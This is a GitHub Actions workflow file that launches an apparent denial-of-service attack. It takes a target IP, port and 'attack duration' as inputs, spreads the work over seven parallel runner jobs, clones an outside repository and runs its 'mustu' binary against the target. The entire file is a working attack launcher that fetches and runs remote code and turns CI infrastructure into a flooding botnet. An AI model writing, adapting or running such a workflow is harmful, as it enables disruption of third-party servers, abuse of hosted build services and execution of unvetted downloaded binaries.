name: mustu instant parallel

on:
  workflow_dispatch:
    inputs:
      ip:
        description: "Target IP"
        required: true
      port:
        description: "Target Port"
        required: true
      time:
        description: "Attack Duration"
        required: true

jobs:
  mustu:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job: [1,2,3,4,5,6,7]  # 7 parallel jobs
    steps:
      - name: Clone and run attack instantly
        run: |
          git clone https://github.com/rajbhai1212/binary.git
          cd binary
          chmod +x mustu
          ./mustu ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }}
